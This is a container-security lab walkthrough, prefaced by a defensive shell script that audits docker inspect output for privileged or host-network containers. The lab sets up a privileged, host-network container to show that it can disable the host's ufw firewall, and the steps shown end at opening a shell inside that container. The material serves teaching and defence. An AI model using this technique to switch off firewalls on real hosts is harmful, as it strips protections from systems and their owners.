Running a container with both the --privileged and --net=host flags lets processes inside it tamper with the host machine's network stack.
In this attack, the host machine's Uncomplicated Firewall (ufw) is disabled from inside a container.
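A defender-side check for the flag combination described above, as an added example that is not part of the original lab: it reads fields from docker inspect and flags containers that share the host network stack with the rights to administer it. It goes slightly beyond the page by also treating --cap-add NET_ADMIN (or ALL) like --privileged for this purpose; the function names and sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the original lab.
# Input: one container per line, "<name> <privileged> <network-mode> <cap-add list>".
# On a Docker host, produce that input with:
#   docker ps -q | xargs -r docker inspect --format \
#     '{{.Name}} {{.HostConfig.Privileged}} {{.HostConfig.NetworkMode}} {{.HostConfig.CapAdd}}'

audit_containers() {
    while read -r name priv net caps; do
        [ -n "$name" ] || continue
        name=${name#/}            # docker inspect prefixes container names with "/"

        # --privileged grants every capability, including NET_ADMIN.
        net_admin=$priv
        case "$caps" in
            *NET_ADMIN*|*ALL*) net_admin=true ;;
        esac

        if [ "$net" = host ] && [ "$net_admin" = true ]; then
            # The combination used in this lab: host firewall rules are writable.
            echo "EXPOSED $name: shares the host network stack and can administer it"
        elif [ "$priv" = true ]; then
            echo "REVIEW $name: privileged, separate network namespace"
        elif [ "$net" = host ]; then
            echo "REVIEW $name: host network, no NET_ADMIN"
        fi
    done
}

# Constructed sample data (not real inspect output from the lab host).
sample_lines() {
    cat <<'EOF'
/vul_flask true host []
/web false bridge []
/monitor false host [NET_ADMIN]
/builder true bridge []
/proxy false host []
EOF
}

sample_lines | audit_containers
```
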
Step 1:
Open Terminal
Step 2:
Check if ufw is enabled on the host machine by running ufw status
root@we45:~# ufw status
Status: inactive
Step 3:
Enable ufw by running ufw enable
root@we45:~# ufw enable
Firewall is active and enabled on system startup
Step 4:
Run docker run -d --privileged --net=host --name vul_flask abhaybhargav/vul_flask to start a docker container.
root@we45:~# docker run -d --privileged --net=host --name vul_flask abhaybhargav/vul_flask
6733abdce5042a90db8b7d40a08155470c727e8b3864eda519714e172f63be88
Step 5:
Run docker ps to view all running containers.
root@we45:~# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d0169e5801fe abhaybhargav/vul_flask "python app.py" 24 seconds ago Up 22 seconds 5050/tcp vul_flask
Step 6:
Run docker exec -it vul_flask bash to open a shell inside the running container.